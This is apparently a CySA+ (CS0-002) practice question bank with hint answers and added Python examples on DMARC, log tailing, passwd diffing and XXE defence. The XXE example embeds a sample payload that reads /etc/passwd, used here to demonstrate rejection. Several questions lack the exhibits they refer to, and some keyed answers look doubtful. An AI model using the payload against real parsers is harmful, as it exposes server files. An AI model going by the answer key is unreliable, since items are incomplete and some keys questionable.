CS0-002 Topic 1
Q1.A security analyst is correlating, ranking, and enriching raw data into a report that will be interpreted by humans or machines to draw conclusions and create actionable recommendations. Which of the following steps in the intelligence cycle is the security analyst performing?
A. Analysis and production
B. Processing and exploitation
C. Dissemination and evaluation
D. Data collection
E. Planning and direction
Hint answer: A
Q2.A financial organization has offices located globally. Per the organization’s policies and procedures, all executives who conduct business overseas must have their mobile devices checked for malicious software or evidence of tampering upon their return. The information security department oversees this process, and no executive has had a device compromised. The Chief Information Security Officer wants to implement an additional safeguard to protect the organization’s data.
Which of the following controls would work BEST to protect the privacy of the data if a device is stolen?
A. Implement a mobile device wiping solution for use if a device is lost or stolen.
B. Install a DLP solution to track data flow.
C. Install an encryption solution on all mobile devices.
D. Train employees to report a lost or stolen laptop to the security department immediately.
Hint answer: C
Q3.During routine monitoring, a security analyst identified the following enterprise network traffic:
Packet capture output:
Which of the following BEST describes what the security analyst observed?
A. 66.187.224.210 set up a DNS hijack with 192.168.12.21.
B. 192.168.12.21 made a TCP connection to 66.187.224.210.
C. 192.168.12.21 made a TCP connection to 209.132.177.50.
D. 209.132.177.50 set up a TCP reset attack to 192.168.12.21.
Hint answer: C
Q4.A security analyst is performing a Diamond Model analysis of an incident the company had last quarter. A potential benefit of this activity is that it can identify:
A. detection and prevention capabilities to improve.
B. which systems were exploited more frequently.
C. possible evidence that is missing during forensic analysis.
D. which analysts require more training.
E. the time spent by analysts on each of the incidents.
Hint answer: A
Q5.A security analyst discovers suspicious host activity while performing monitoring activities. The analyst pulls a packet capture for the activity and sees the following:
Follow TCP stream:
Which of the following describes what has occurred?
A. The host attempted to download an application from utoftor.com.
B. The host downloaded an application from utoftor.com.
C. The host attempted to make a secure connection to utoftor.com.
D. The host rejected the connection from utoftor.com.
Hint answer: A
Q6.An organization has the following policy statements:
✑ All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized content.
✑ All network activity will be logged and monitored.
✑ Confidential data will be tagged and tracked.
✑ Confidential data must never be transmitted in an unencrypted form.
✑ Confidential data must never be stored on an unencrypted mobile device.
Which of the following is the organization enforcing?
A. Acceptable use policy
B. Data privacy policy
C. Encryption policy
D. Data management policy
Hint answer: C
Q7.An information security analyst discovered a virtual machine server was compromised by an attacker. Which of the following should be the FIRST steps to confirm and respond to the incident? (Choose two.)
A. Pause the virtual machine.
B. Shut down the virtual machine.
C. Take a snapshot of the virtual machine.
D. Remove the NIC from the virtual machine.
E. Review host hypervisor log of the virtual machine.
F. Execute a migration of the virtual machine.
Hint answer: A, C
Q8.An information security analyst discovered a virtual machine server was compromised by an attacker. Which of the following should be the FIRST step to confirm and respond to the incident?
A. Pause the virtual machine,
B. Shut down the virtual machine.
C. Take a snapshot of the virtual machine.
D. Remove the NIC from the virtual machine.
Hint answer: A
Q9.A security analyst received a SIEM alert regarding high levels of memory consumption for a critical system. After several attempts to remediate the issue, the system went down. A root cause analysis revealed a bad actor forced the application to not reclaim memory. This caused the system to be depleted of resources. Which of the following BEST describes this attack?
A. Injection attack
B. Memory corruption
C. Denial of service
D. Array attack
Hint answer: C
Q10.A company’s legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage to a third party. The IT management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all data to be kept on the third-party network?
A. VDI
B. SaaS
C. CASB
D. FaaS
Hint answer: B
Q11.An analyst receives artifacts from a recent intrusion and is able to pull a domain, IP address, email address, and software version. Which of the following points of the Diamond Model of Intrusion Analysis does this intelligence represent?
A. Infrastructure
B. Capabilities
C. Adversary
D. Victims
Hint answer: A
Q12.A company stores all of its data in the cloud. All company-owned laptops are currently unmanaged, and all users have administrative rights. The security team is having difficulty identifying a way to secure the environment. Which of the following would be the BEST method to protect the company’s data?
A. Implement UEM on all systems and deploy security software.
B. Implement DLP on all workstations and block company data from being sent outside the company.
C. Implement a CASB and prevent certain types of data from being downloaded to a workstation.
D. Implement centralized monitoring and logging for all company systems.
Hint answer: C
Q13.A company’s domain has been spoofed in numerous phishing campaigns. An analyst needs to determine why the company is a victim of domain spoofing, despite having a DMARC record that should tell mailbox providers to ignore any email that fails DMARC. Upon review of the record, the analyst finds the following: v=DMARC1; p=none; fo=0; rua=mailto:security@company.com; ruf=mailto:security@company.com; adkim=r; rf=afrf; ri=86400;
Which of the following BEST explains the reason why the company’s requirements are not being processed correctly by mailbox providers?
A. The DMARC record’s DKIM alignment tag is incorrectly configured.
B. The DMARC record’s policy tag is incorrectly configured.
C. The DMARC record does not have an SPF alignment tag.
D. The DMARC record’s version tag is set to DMARC1 instead of the current version, which is DMARC3.
Hint answer: B
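The record in the question is syntactically valid; its problem is purely the policy tag. p=none tells receivers to deliver mail that fails DMARC and only send reports, adkim=r (relaxed DKIM alignment) is the default and is not a misconfiguration, and DMARC1 is the only version the tag can carry. The parser below, an added example that is not part of the question bank, reads a DMARC TXT record and returns the reasons it would not enforce, so the p=none finding can be checked mechanically. The record string is the one quoted in the question; everything else is this example's own.

```python
"""Parse a DMARC TXT record and report why it would not enforce.

Added example, not from the question bank. RECORD_FROM_QUESTION is the record
quoted in the question; the parser and the findings are this example's own.
"""

# Record quoted in the question (p=none is the reason spoofed mail gets through).
RECORD_FROM_QUESTION = (
    "v=DMARC1; p=none; fo=0; rua=mailto:security@company.com; "
    "ruf=mailto:security@company.com; adkim=r; rf=afrf; ri=86400;"
)

# Defaults for tags that may be omitted (RFC 7489): relaxed alignment, 100 %.
DEFAULTS = {"adkim": "r", "aspf": "r", "pct": "100"}


def parse_dmarc(record: str) -> dict:
    """Split 'tag=value; tag=value' into a dict with lower-cased tag names."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str) -> list[str]:
    """Return human-readable findings; an empty list means the record enforces."""
    tags = parse_dmarc(record)
    findings = []
    if tags.get("v") != "DMARC1":
        findings.append("version tag must be exactly DMARC1 (the only defined version)")
    policy = tags.get("p")
    if policy is None:
        findings.append("policy tag p= is required")
    elif policy == "none":
        findings.append("p=none is monitor-only: receivers deliver mail that fails "
                        "DMARC and merely report it")
    elif policy not in ("quarantine", "reject"):
        findings.append(f"unknown policy value {policy!r}")
    pct = int(tags.get("pct", DEFAULTS["pct"]))
    if policy in ("quarantine", "reject") and pct < 100:
        findings.append(f"pct={pct} applies the policy to only {pct}% of failing messages")
    # sp= inherits p= when omitted, so only an explicit weakening is flagged.
    if tags.get("sp") == "none" and policy in ("quarantine", "reject"):
        findings.append("sp=none leaves subdomains unprotected although p= enforces")
    if "rua" not in tags:
        findings.append("no rua= address: aggregate reports will not be received")
    return findings


def enforces(record: str) -> bool:
    """True when no finding prevents mailbox providers from acting on the policy."""
    return not assess_dmarc(record)


if __name__ == "__main__":
    for finding in assess_dmarc(RECORD_FROM_QUESTION):
        print(finding)
```

Moving to p=quarantine and then p=reject, with pct=100, is the change the question is asking for; the alignment tags can stay as they are.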
Q14.Massivelog.log has grown to 40GB on a Windows server. At this size, local tools are unable to read the file, and it cannot be moved off the virtual server where it is located. Which of the following lines of PowerShell script will allow a user to extract the last 10,000 lines of the log for review?
A. tail -10000 Massivelog.log > extract.txt
B. info tail n -10000 Massivelog.log | extract.txt;
C. get content ‘./Massivelog.log’ -Last 10000 | extract.txt
D. get-content ‘./Massivelog.log’ -Last 10000 > extract.txt;
Hint answer: D
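Option D works because Get-Content -Tail (of which -Last is an alias) reads the file from its end instead of streaming all 40 GB through the pipeline and then discarding everything but the last 10,000 lines. The function below is an added example, not part of the question bank, that implements that same read-backwards technique in Python so the mechanism is visible: it seeks to the end of the file and walks back in fixed-size blocks until it has collected enough newlines, so memory use does not grow with the file. The sample log it writes is constructed for the demonstration.

```python
"""Extract the last N lines of a very large file without reading it from the start.

Added example, not from the question bank: the read-from-the-end technique behind
Get-Content -Tail, written in Python. The sample log content is constructed.
"""
import os
import tempfile


def tail_lines(path: str, n: int, block_size: int = 64 * 1024) -> list[str]:
    """Return the last n lines of path, reading backwards in block_size chunks.

    Memory use is bounded by the n lines returned plus one block, regardless of
    file size, because the file is never read from the beginning.
    """
    if n <= 0:
        return []
    chunks = []
    newlines_seen = 0
    with open(path, "rb") as fh:
        fh.seek(0, os.SEEK_END)
        pos = fh.tell()
        # Keep reading backwards until n+1 newlines have been seen (n complete
        # lines plus the end of the line before them) or offset 0 is reached.
        while pos > 0 and newlines_seen <= n:
            read_size = min(block_size, pos)
            pos -= read_size
            fh.seek(pos)
            block = fh.read(read_size)
            chunks.append(block)
            newlines_seen += block.count(b"\n")
    data = b"".join(reversed(chunks))
    lines = data.split(b"\n")
    if lines and lines[-1] == b"":  # file ends with a newline
        lines.pop()
    return [line.decode("utf-8", errors="replace") for line in lines[-n:]]


def build_sample_log(line_count: int) -> str:
    """Write a constructed log with line_count numbered lines; return its path."""
    fd, path = tempfile.mkstemp(suffix=".log")
    with os.fdopen(fd, "w") as fh:
        for i in range(1, line_count + 1):
            fh.write(f"2023-01-01T00:00:{i % 60:02d}Z line {i}\n")
    return path


if __name__ == "__main__":
    sample = build_sample_log(100_000)
    try:
        last = tail_lines(sample, 10_000)
        print(f"{len(last)} lines; first={last[0]!r} last={last[-1]!r}")
    finally:
        os.remove(sample)
```

The same seek-and-read-backwards idea is why the PowerShell one-liner in option D finishes in seconds on a file that the GUI tools in the scenario cannot open at all.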
Q15.A security analyst is reviewing the following Internet usage trend report:
Which of the following usernames should the security analyst investigate further?
A. User 1
B. User 2
C. User 3
D. User 4
Hint answer: B
Q16.The incident response team is working with a third-party forensic specialist to investigate the root cause of a recent intrusion. An analyst was asked to submit sensitive network design details for review. The forensic specialist recommended electronic delivery for efficiency, but email was not an approved communication channel to send network details. Which of the following BEST explains the importance of using a secure method of communication during incident response?
A. To prevent adversaries from intercepting response and recovery details
B. To ensure intellectual property remains on company servers
C. To have a backup plan in case email access is disabled
D. To ensure the management team has access to all the details that are being exchanged
Hint answer: A
Q17.Which of the following allows Secure Boot to be enabled?
A. eFuse
B. UEFI
C. HSM
D. PAM
Hint answer: B
Q18.A newly appointed Chief Information Security Officer has completed a risk assessment review of the organization and wants to reduce the numerous risks that were identified. Which of the following will provide a trend of risk mitigation?
A. Planning
B. Continuous monitoring
C. Risk response
D. Risk analysis
E. Oversight
Hint answer: B
Q19.A developer downloaded and attempted to install a file transfer application in which the installation package is bundled with adware. The next-generation antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?
A. Blacklist the hash in the next-generation antivirus system.
B. Manually delete the file from each of the workstations.
C. Remove administrative rights from all developer workstations.
D. Block the download of the file via the web proxy.
Hint answer: D
Q20.Which of the following is MOST important when developing a threat hunting program?
A. Understanding penetration testing techniques
B. Understanding how to build correlation rules within a SIEM
C. Understanding security software technologies
D. Understanding assets and categories of assets
Hint answer: D
Q21.The help desk is having difficulty keeping up with all onboarding and offboarding requests. Managers often submit requests for new users at the last minute, causing the help desk to scramble to create accounts across many different interconnected systems. Which of the following solutions would work BEST to assist the help desk with the onboarding and offboarding process while protecting the company’s assets?
A. MFA
B. CASB
C. SSO
D. RBAC
Hint answer: D
Q22.A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?
A. CASB
B. VPC
C. Federation
D. VPN
Hint answer: D
Q23.A company has a cluster of web servers that is critical to the business. A systems administrator installed a utility to troubleshoot an issue, and the utility caused the entire cluster to go offline. Which of the following solutions would work BEST to prevent this from happening again?
A. Change management
B. Application whitelisting
C. Asset management
D. Privilege management
Hint answer: A
Q24.A company’s Chief Information Officer wants to use a CASB solution to ensure policies are being met during cloud access. Due to the nature of the company’s business and risk appetite, the management team elected to not store financial information in the cloud. A security analyst needs to recommend a solution to mitigate the threat of financial data leakage into the cloud. Which of the following should the analyst recommend?
A. Utilize the CASB to enforce DLP data-at-rest protection for financial information that is stored on premises.
B. Do not utilize the CASB solution for this purpose, but add DLP on premises for data in motion.
C. Utilize the CASB to enforce DLP data-in-motion protection for financial information moving to the cloud.
D. Do not utilize the CASB solution for this purpose, but add DLP on premises for data at rest.
Hint answer: C
Q25.An employee was found to have performed fraudulent activities. The employee was dismissed, and the employee’s laptop was sent to the IT service desk to undergo a data sanitization procedure. However, the security analyst responsible for the investigation wants to avoid data sanitization. Which of the following can the security analyst use to justify the request?
A. GDPR
B. Data correlation procedure
C. Evidence retention
D. Data retention
Hint answer: C
Q26.During the forensic analysis of a compromised machine, a security analyst discovers some binaries that are exhibiting abnormal behaviors. After extracting the strings, the analyst finds unexpected content. Which of the following is the NEXT step the analyst should take?
A. Validate the binaries’ hashes from a trusted source.
B. Use file integrity monitoring to validate the digital signature.
C. Run an antivirus against the binaries to check for malware.
D. Only allow whitelisted binaries to execute.
Hint answer: C
Q27.A security analyst is investigating a compromised Linux server. The analyst issues the ps command and receives the following output:
Which of the following commands should the administrator run NEXT to further analyze the compromised system?
A. strace /proc/1301
B. rpm -V openssh-server
C. /bin/ls -1 /proc/1301/exe
D. kill -9 1301
Hint answer: C
Q28.SIMULATION –
Approximately 100 employees at your company have received a phishing email. As a security analyst, you have been tasked with handling this situation.
INSTRUCTIONS –
Review the information provided and determine the following:
1. How many employees clicked on the link in the phishing email?
2. On how many workstations was the malware installed?
3. What is the executable file name of the malware?
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hint answer: not provided (the simulation screens this question depends on are not reproduced on this page)
Q29.A company’s application development has been outsourced to a third-party development team. Based on the SLA, the development team must follow industry best practices for secure coding. Which of the following is the BEST way to verify this agreement?
A. Input validation
B. Security regression testing
C. Application fuzzing
D. User acceptance testing
E. Stress testing
Hint answer: C
Q30.Company A is in the process of merging with Company B. As part of the merger, connectivity between the ERP systems must be established so pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data transfers between the two entities?
A. Set up an FTP server that both companies can access and export the required financial data to a folder.
B. Set up a VPN between Company A and Company B, granting access only to the ERPs within the connection.
C. Set up a PKI between Company A and Company B and intermediate shared certificates between the two entities.
D. Create static NATs on each entity’s firewalls that map to the ERP systems and use native ERP authentication to allow access.
Hint answer: B
Q31.An analyst is reviewing the following output as part of an incident:
Which of the following is MOST likely happening?
A. The hosts are part of a reflective denial-of-service attack
B. Information is leaking from the memory of host 10.20.30.40
C. Sensitive data is being exfiltrated by host 192.168.1.10
D. Host 192.168.1.10 is performing firewall port knocking
Hint answer: B
Q32.During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
A. Share details of the security incident with the organization’s human resources management team.
B. Note the security incident so other analysts are aware the traffic is malicious.
C. Communicate the security incident to the threat team for further review and analysis.
D. Report the security incident to a manager for inclusion in the daily report.
Hint answer: B
Q33.During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also notes there is no other alert in place for this traffic. After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
A. Share details of the security incident with the organization’s human resources management team.
B. Note the security incident to junior analysts so they are aware of the traffic.
C. Communicate the security incident to the threat team for further review and analysis.
D. Report the security incident for inclusion in the daily report.
Hint answer: C
Q34.Employees of a large financial company are continuously being infected by strains of malware that are not detected by EDR tools. Which of the following is the BEST security control to implement to reduce corporate risk while allowing employees to exchange files at client sites?
A. MFA on the workstations
B. Additional host firewall rules
C. VDI environment
D. Hard drive encryption
E. Network access control
F. Network segmentation
Hint answer: C
Q35.An organization is experiencing security incidents in which a systems administrator is creating unauthorized user accounts. A security analyst has created a script to snapshot the system configuration each day. Following is one of the scripts: cat /etc/passwd > daily_$(date +"%m_%d_%Y")
This script has been running successfully every day. Which of the following commands would provide the analyst with additional useful information relevant to the above script?
A. diff daily_11_03_2019 daily_11_04_2019
B. ps -ef | grep admin > daily_process_$(date +"%m_%d_%Y")
C. more /etc/passwd > daily_$(date +"%m_%d_%Y_%H:%M:%S")
D. ls -lai /usr/sbin > daily_applications
Hint answer: A
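The daily snapshot is only useful once two of them are compared: diffing consecutive copies of /etc/passwd is what exposes an account that appeared overnight. The script below is an added example, not part of the question bank, that does the comparison with the entries parsed rather than as raw text lines, so it can say not just that a line changed but whether a new account was created, whether it has UID 0, and whether a service account's shell was switched from nologin to an interactive shell. Both snapshots are constructed sample data; the usernames and UIDs are invented for the demonstration.

```python
"""Compare two daily /etc/passwd snapshots and report account changes.

Added example, not from the question bank. It does what the diff in option A
does, but with parsed fields so that new accounts, removed accounts and
privilege changes are reported explicitly. Both snapshots are constructed.
"""

# Constructed snapshot standing in for daily_11_03_2019.
SNAPSHOT_DAY1 = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""

# Constructed snapshot standing in for daily_11_04_2019: a new UID-0 account,
# a removed account, and a service account given an interactive shell.
SNAPSHOT_DAY2 = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
support:x:0:0:Support:/home/support:/bin/bash
"""


def parse_passwd(text: str) -> dict:
    """Map username -> dict of the remaining passwd fields."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, _pw, uid, gid, gecos, home, shell = fields
        entries[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                         "home": home, "shell": shell}
    return entries


def diff_passwd(old: str, new: str) -> dict:
    """Return added, removed and modified accounts between two snapshots."""
    before, after = parse_passwd(old), parse_passwd(new)
    added = sorted(set(after) - set(before))
    removed = sorted(set(before) - set(after))
    modified = {}
    for name in set(before) & set(after):
        changes = {k: (before[name][k], after[name][k])
                   for k in before[name] if before[name][k] != after[name][k]}
        if changes:
            modified[name] = changes
    return {"added": added, "removed": removed, "modified": modified}


def privileged_findings(old: str, new: str) -> list[str]:
    """Turn the diff into the findings an analyst should look at first."""
    d = diff_passwd(old, new)
    after = parse_passwd(new)
    findings = []
    for name in d["added"]:
        note = f"new account {name} (uid {after[name]['uid']})"
        if after[name]["uid"] == 0:
            note += " with UID 0: root-equivalent"
        findings.append(note)
    for name in d["removed"]:
        findings.append(f"account {name} removed")
    for name, changes in d["modified"].items():
        if "uid" in changes and changes["uid"][1] == 0:
            findings.append(f"{name} uid changed to 0")
        if "shell" in changes and changes["shell"][0].endswith("nologin"):
            findings.append(f"{name} shell changed from nologin to {changes['shell'][1]}")
    return findings


if __name__ == "__main__":
    for finding in privileged_findings(SNAPSHOT_DAY1, SNAPSHOT_DAY2):
        print(finding)
```

In practice the same comparison should also be run against /etc/shadow, /etc/group and /etc/sudoers.d, since an administrator who can add a passwd entry can just as easily grant an existing account sudo rights without the passwd file changing at all.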
Q36.During an incident response procedure, a security analyst collects a hard drive to analyze a possible vector of compromise. There is a Linux swap partition on the hard drive that needs to be checked. Which of the following should the analyst use to extract human-readable content from the partition?
A. strings
B. head
C. fsstat
D. dd
Hint answer: A
Q37.Which of the following BEST describes how logging and monitoring work when entering into a public cloud relationship with a service provider?
A. Logging and monitoring are not needed in a public cloud environment.
B. Logging and monitoring are done by the data owners.
C. Logging and monitoring duties are specified in the SLA and contract.
D. Logging and monitoring are done by the service provider.
Hint answer: C
Q38.A product security analyst has been assigned to evaluate and validate a new product’s security capabilities. Part of the evaluation involves reviewing design changes at specific intervals for security deficiencies, recommending changes, and checking for changes at the next checkpoint. Which of the following BEST describes the activity being conducted?
A. User acceptance testing
B. Stress testing
C. Code review
D. Security regression testing
Hint answer: C
Q39.Which of the following BEST explains the function of a managerial control?
A. To scope the security planning, program development, and maintenance of the security life cycle
B. To guide the development of training, education, security awareness programs, and system maintenance
C. To implement data classification, risk assessments, security control reviews, and contingency planning
D. To ensure tactical design, selection of technology to protect data, logical access reviews, and the implementation of audit trails
Hint answer: C
Q40.A user’s computer has been running slowly when the user tries to access web pages. A security analyst runs the command netstat -aon from the command line and receives the following output:
Which of the following lines indicates the computer may be compromised?
A. Line 1
B. Line 2
C. Line 3
D. Line 4
E. Line 5
F. Line 6
Hint answer: C
Q41.Which of the following is MOST closely related to the concept of privacy?
A. The implementation of confidentiality, integrity, and availability
B. A system’s ability to protect the confidentiality of sensitive information
C. An individual’s control over personal information
D. A policy implementing strong identity management processes
Hint answer: C
Q42.A company’s blocklist has outgrown the current technologies in place. The ACLs are at maximum, and the IPS signatures only allow a certain amount of space for domains to be added, creating the need for multiple signatures. Which of the following configuration changes to the existing controls would be the MOST appropriate to improve performance?
A. Implement a host-file-based solution that will use a list of all domains to deny for all machines on the network.
B. Create an IDS for the current blocklist to determine which domains are showing activity and may need to be removed.
C. Review the current blocklist and prioritize it based on the level of threat severity. Add the domains with the highest severity to the blocklist and remove the lower-severity threats from it.
D. Review the current blocklist to determine which domains can be removed from the list and then update the ACLs and IPS signatures.
Hint answer: C
Q43.A security analyst found the following entry in a server log:
The analyst executed netstat and received the following output:
Which of the following lines in the output confirms this was successfully executed by the server?
A. 1
B. 2
C. 3
D. 4
E. 5
F. 6
G. 7
Hint answer: E
Q44.A security administrator needs to provide access from partners to an isolated laboratory network inside an organization that meets the following requirements:
* The partners’ PCs must not connect directly to the laboratory network
* The tools the partners need to access while on the laboratory network must be available to all partners
* The partners must be able to run analyses on the laboratory network, which may take hours to complete
Which of the following capabilities will MOST likely meet the security objectives of the request?
A. Deployment of a jump box to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
B. Deployment of a firewall to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools for analysis
C. Deployment of a firewall to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analysis
D. Deployment of a jump box to allow access to the laboratory network and use of VDI in non-persistent mode to provide the necessary tools for analysis
Hint answer: A
Q45.After an incident involving a phishing email, a security analyst reviews the following email access log:
Based on this information, which of the following accounts was MOST likely compromised?
A. CARLB
B. CINDYP
C. GILLIANO
D. ANDREAD
E. LAURAB
Hint answer: D
Q46.A company frequently experiences issues with credential stuffing attacks. Which of the following is the BEST control to help prevent these attacks from being successful?
A. SIEM
B. IDS
C. MFA
D. TLS
Hint answer: C
Q47.During an investigation, a security analyst determines suspicious activity occurred during the night shift over the weekend. Further investigation reveals the activity was initiated from an internal IP going to an external website. Which of the following would be the MOST appropriate recommendation to prevent similar activity from happening in the future?
A. An IPS signature modification for the specific IP addresses
B. An IDS signature modification for the specific IP addresses
C. A firewall rule that will block port 80 traffic
D. Implement a web proxy to restrict malicious web content
Hint answer: D
Q48.A security analyst is researching ways to improve the security of a company’s email system to mitigate emails that are impersonating company executives. Which of the following would be BEST for the analyst to configure to achieve this objective?
A. A TXT record on the name server for SPF
B. DNSSEC keys to secure replication
C. Domain Keys Identified Mail
D. A sandbox to check incoming mail
Hint answer: C
Q49.A security analyst identified one server that was compromised and used as a data mining machine, and a clone of the hard drive that was created. Which of the following will MOST likely provide information about when and how the machine was compromised and where the malware is located?
A. System timeline reconstruction
B. System registry extraction
C. Data carving
D. Volatile memory analysis
Hint answer: A
Q50.A business recently acquired a software company. The software company’s security posture is unknown. However, based on an initial assessment, there are limited security controls. No significant security monitoring exists. Which of the following is the NEXT step that should be completed to obtain information about the software company’s security posture?
A. Develop an asset inventory to determine the systems within the software company.
B. Review relevant network drawings, diagrams, and documentation.
C. Perform penetration tests against the software company’s internal and external networks.
D. Baseline the software company’s network to determine the ports and protocols in use.
Hint answer: A
Q51.A security analyst identified some potentially malicious processes after capturing the contents of memory from a machine during incident response. Which of the following procedures is the NEXT step for further investigation?
A. Data carving
B. Timeline construction
C. File cloning
D. Reverse engineering
Hint answer: D
Q52.A company recently experienced a breach of sensitive information that affects customers across multiple geographical regions. Which of the following roles would be BEST suited to determine the breach notification requirements?
A. Legal counsel
B. Chief Security Officer
C. Human resources
D. Law enforcement
Hint answer: A
Q53.After a remote command execution incident occurred on a web server, a security analyst found the following piece of code in an XML file:
Which of the following is the BEST solution to mitigate this type of attack?
A. Implement a better level of user input filters and content sanitization.
B. Properly configure XML handlers so they do not process &ent parameters coming from user inputs.
C. Use parameterized queries to avoid user inputs from being processed by the server.
D. Escape user inputs using character encoding conjoined with whitelisting.
Hint answer: B
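Option B is the right fix because the attack lives in the document's DTD, not in the element content that input filters normally look at: an <!ENTITY ... SYSTEM "..."> declaration makes the parser itself fetch the file or URL when it expands the reference. The hardening is therefore done at the parser, by refusing DTDs and external entity resolution, and where the parser library resolves entities by default that option has to be switched off in its configuration. The code below is an added example, not part of the question bank, that adds a belt-and-braces layer in front of a parser: any untrusted document carrying a DOCTYPE or ENTITY declaration is rejected before parsing starts. The XXE-shaped payload and the benign document are both constructed for the demonstration.

```python
"""Reject XML that declares a DTD before handing it to a parser.

Added example, not from the question bank. The payload is a constructed sample
in the classic XXE shape; the benign document is constructed too.
"""
import re
import xml.etree.ElementTree as ET

# Constructed XXE-style payload: an external entity pointing at a local file.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY ent SYSTEM "file:///etc/passwd">
]>
<order><item>&ent;</item></order>"""

# Constructed benign document of the same shape.
BENIGN_XML = """<?xml version="1.0"?>
<order><item>widget</item></order>"""

# Scanning the whole byte string errs on the side of rejection: a document that
# merely mentions "<!DOCTYPE" inside a CDATA section is also refused.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
_ENTITY_RE = re.compile(rb"<!ENTITY", re.IGNORECASE)


class DtdNotAllowed(ValueError):
    """Raised when untrusted input carries a DTD or entity declaration."""


def parse_untrusted_xml(data) -> ET.Element:
    """Parse XML from an untrusted source, refusing any DTD or entity declaration.

    Rejecting the DTD removes the vehicle for external entities (file / URL
    fetches) and for internal entity expansion attacks in one step.
    """
    raw = data.encode("utf-8") if isinstance(data, str) else data
    if _DOCTYPE_RE.search(raw) or _ENTITY_RE.search(raw):
        raise DtdNotAllowed("DTD / entity declarations are not accepted from untrusted input")
    return ET.fromstring(raw)


def item_text(data) -> str:
    """Return the <item> text of an accepted document, or 'REJECTED'."""
    try:
        root = parse_untrusted_xml(data)
    except DtdNotAllowed:
        return "REJECTED"
    item = root.find("item")
    return item.text if item is not None and item.text else ""


if __name__ == "__main__":
    print("payload:", item_text(XXE_PAYLOAD))
    print("benign: ", item_text(BENIGN_XML))
```

If the application genuinely needs DTDs from trusted partners, keep this check on the untrusted path only and configure the parser on the trusted path to disable external entity resolution rather than relying on input filtering (options A and D), which cannot reliably distinguish a hostile entity declaration from legitimate markup.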
Q54.A security analyst is reviewing a vulnerability scan report and notes the following finding:
As part of the detection and analysis procedures, which of the following should the analyst do NEXT?
A. Patch or reimage the device to complete the recovery.
B. Restart the antiviruses running processes.
C. Isolate the host from the network to prevent exposure.
D. Confirm the workstation’s signatures against the most current signatures.
Hint answer: C
Q55.Which of the following is the BEST security practice to prevent ActiveX controls from running malicious code on a user’s web application?
A. Deploying HIPS to block malicious ActiveX code
B. Installing network-based IPS to block malicious ActiveX code
C. Adjusting the web-browser settings to block ActiveX controls
D. Configuring a firewall to block traffic on ports that use ActiveX controls
Hint answer: C
Q56.While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following should the analyst do FIRST?
A. Block the sender in the email gateway.
B. Delete the email from the company’s email servers.
C. Ask the sender to stop sending messages.
D. Review the message in a secure environment.
Hint answer: D
Q57.In SIEM software, a security analyst detected some changes to hash signatures from monitored files during the night followed by SMB brute-force attacks against the file servers. Based on this behavior, which of the following actions should be taken FIRST to prevent a more serious compromise?
A. Fully segregate the affected servers physically in a network segment, apart from the production network.
B. Collect the network traffic during the day to understand if the same activity is also occurring during business hours.
C. Check the hash signatures, comparing them with malware databases to verify if the files are infected.
D. Collect all the files that have changed and compare them with the previous baseline.
Hint answer: C
Q58.The security team decides to meet informally to discuss and test their response plan for potential security breaches and emergency situations. Which of the following types of training will the security team perform?
A. Tabletop exercise
B. Red-team attack
C. System assessment implementation
D. Blue-team training
E. White-team engagement
Hint answer: A
Q59.A security analyst is conducting a post-incident log analysis to determine which indicators can be used to detect further occurrences of a data exfiltration incident. The analyst determines backups were not performed during this time and reviews the following:
Which of the following should the analyst review to find out how the data was exfiltrated?
A. Monday’s logs
B. Tuesday’s logs
C. Wednesday’s logs
D. Thursday’s logs
Hint answer: D
Q60.In response to an audit finding, a company’s Chief Information Officer (CIO) instructed the security department to increase the security posture of the vulnerability management program. Currently, the company’s vulnerability management program has the following attributes:
✑ It is unauthenticated.
✑ It is at the minimum interval specified by the audit framework.
✑ It only scans well-known ports.
Which of the following would BEST increase the security posture of the vulnerability management program?
A. Expand the ports being scanned to include all ports. Increase the scan interval to a number the business will accept without causing service interruption. Enable authentication and perform credentialed scans.
B. Expand the ports being scanned to include all ports. Keep the scan interval at its current level. Enable authentication and perform credentialed scans.
C. Expand the ports being scanned to include all ports. Increase the scan interval to a number the business will accept without causing service interruption. Continue unauthenticated scanning.
D. Continue scanning the well-known ports. Increase the scan interval to a number the business will accept without causing service interruption. Enable authentication and perform credentialed scans.
Hint answer: B
